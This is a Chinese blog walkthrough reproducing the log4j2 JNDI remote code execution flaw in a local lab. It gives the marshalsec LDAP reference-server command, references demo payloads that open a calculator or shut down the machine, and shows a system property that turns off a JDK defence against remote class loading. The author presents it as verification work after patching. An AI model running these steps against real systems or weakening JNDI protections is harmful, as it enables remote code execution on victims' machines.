log4j代码注入漏洞复现

最新推荐文章于 2024-05-29 07:43:29 发布
最新推荐文章于 2024-05-29 07:43:29 发布
阅读量3.4k 收藏 2
点赞数 1
文章标签: 安全 java log4j2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AnNanDu/article/details/121973868
版权

1.简介

前些天log4j官方宣布的log4j的漏洞闹得沸沸扬扬,各个公司加班升级修复,我们也在周末要求验证版本保证不受影响,既然知道了漏洞,我们就复现一下,比如让被注入文件的电脑关个机

2.工具准备

https://download.csdn.net/download/AnNanDu/64752930icon-default.png?t=LA92https://download.csdn.net/download/AnNanDu/64752930

里面包含2份源代码,两个工具类

  1. log4j-exp:执行被注入代码的客户端服务
  2. web-goodskill:存放注入文件的http服务
  3. 启动ldap的两个服务

3.复现步骤

1. 将注入文件放入http服务并启动测试下载

文件web-goodskill里有两份demo注入文件,一份打开计算器,一份执行关机

测试可以通过服务下载文件,这一步就算可以了

2. 启动ladp服务映射注入文件

进入到下载的工具包中,在地址栏直接打cmd进入命令框

 执行命令:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8081/#Log4jTest 1389

 启动完成后第二步就完成了

3. log4j2执行注入

IDEA打开log4j-exp找到 log4jRCE 类,执行main方法

 执行结果:

 

 上面那行输出文字是我们的注入代码里写的输出,证明确实将远程代码执行了

想要执行注入的关机代码放开下一行注释就可以了,需要在上文开启ldap服务的在开启ClearDemo类的端口

本地执行是都可以的,但是在远程客户端执行的时候如果没有这个设置则不会拉取远程代码,这是jdk1.8_u191等几个版本后设置的默认设置,防止ldap注入

System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");

 

 

 

 

 

 
 

 
 

 
 

 

 
 


                

        

        

    




            

                    
            

    

      

        

            

              
                
                  余生大大
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    1
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    2
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
                
  • 
                  
                    打赏
                    
                  
                  
    打赏
    
                
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
log4j漏洞复现

				
			

			

				

					Massimo__JAVA的博客
				

				

					08-03
					
					374
					
				

			

		

		

			
				
Log4j是由Apache提供的日志操作包,用于帮助用户处理日志信息。通过Log4j,可以控制日志信息输送的目的地是控制台、文件、GUI组件、甚至是套接口服务器等各种地方。

			
		

	



                

              
                



	

		

			

				
					
解决Apache Log4j 远程代码执行漏洞log4j2部分jar

				
			

			

				

					12-10
				

			

		

		

			
				
解决Apache Log4j 远程代码执行漏洞log4j2部分jar,包含log4j-1.2-api-2.15.0.jar,log4j-api-2.15.0.jar,log4j-core-2.15.0.jar,log4j-to-slf4j-2.15.0.jar

			
		

	



                


  
              

                


	

		

			

				
					
Apache Log4j2(CVE-2021-4101)远程代码执行漏洞复现

				
			

			

				

					今天是几号的博客
				

				

					04-12
					
					2709
					
				

			

		

		

			
				
Apache log4j是Apache的一个开源项目,Java的日志记录工具(同logback)。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。
影响范围
Apache Log4j 2.x 

			
		

	





	

		

			

				
					
JAVA安全Log4j-Jndi注入原理以及利用方式

					
最新发布

				
			

			

				

					qq_53058639的博客
				

				

					05-29
					
					819
					
				

			

		

		

			
				
JDNI(Java Naming and Directory Interface)是Java命名和目录接口,它提供了统一的访问命名和目录服务的API。JDNI主要通过JNDI SPI(Service ProviderInterface)规范来实现,该规范定义了对JNDI提供者应实现的接口。在JNDI体系中,JNDI提供者是指实际提供命名和目录服务的软件组件。JNDISPI规范包含了多个接口,其中最为重要的是Context接口。

			
		

	



		

			
		



	

		

			

				
					
Log4J 漏洞复现

				
			

			

				

					qq_42307546的博客
				

				

					12-13
					
					2845
					
				

			

		

		

			
				
介绍:log4j是一个用Java编写的可靠,快速和灵活的日志框架(API),它在Apache软件许可下发布
log4j存在远程代码执行漏洞,通过lookup来触发漏洞详情参考
https://zhuanlan.zhihu.com/p/444140910
首先我们需要编写一个恶意的类然后编译成class文件
public class Exploit {
   public Exploit(){
       try{
           // 要执行的命令
           String[] comma

			
		

	





	

		

			

				
					
Apache Log4j 2代码漏洞处置指南及检测工具.zip

				
			

			

				

					12-10
				

			

		

		

			
				
Apache Log4j 2存在远程代码执行漏洞处置指南 及期检测工具

			
		

	





	

		

			

				
					
ArcGIS漏洞修补工具(Log4J

				
			

			

				

					01-18
				

			

		

		

			
				
ArcGIS Enterprise 10.9.1及以下版本的 log4j 漏洞修补工具

			
		

	





	

		

			

				
					
Apache Log4j2 远程代码执行漏洞检测工具

				
			

			

				

					12-15
				

			

		

		

			
				
然而,在2021年12月初,一个严重的安全漏洞(CVE-2021-44228)被公开,这个漏洞被称为"Log4Shell",允许攻击者通过注入恶意的JNDI(Java Naming and Directory Interface)链接来执行远程代码,对受影响的系统造成...

			
		

	





	

		

			

				
					
log4j远程执行漏洞,测试源码

				
			

			

				

					12-22
				

			

		

		

			
				
2021年12月,研究人员发现了一个允许任意代码执行的严重漏洞,它存在于Log4j 2的JNDI(Java Naming and Directory Interface)查找功能中。攻击者只需要在日志消息中插入特定的恶意格式字符串,就能触发远程代码执行...

			
		

	





	

		

			

				
					
log4j2.17.2 

				
			

			

				

					04-14
				

			

		

		

			
				
然而,随着技术的发展,安全问题也日益凸显,特别是2021年底爆出的Log4j2远程代码执行(RCE)漏洞,引发了全球范围内的广泛关注。此次,我们聚焦于“log4j2.17.2漏洞修复程序包”,深入探讨该版本如何解决这一安全...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  





	
打赏作者

	

		

		
			
		
		

		

			
余生大大

			
你的鼓励将是我创作的最大动力

		

	

	

			

	

	

    ¥1
    ¥2
    ¥4
    ¥6
    ¥10
    ¥20
	

	

		

			

				

					扫码支付:¥1
				

				

					

					
					获取中
					

				

				

					
					
					扫码支付
				

			

		

		

			
您的余额不足,请更换扫码支付或充值

			
打赏作者

		

	



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值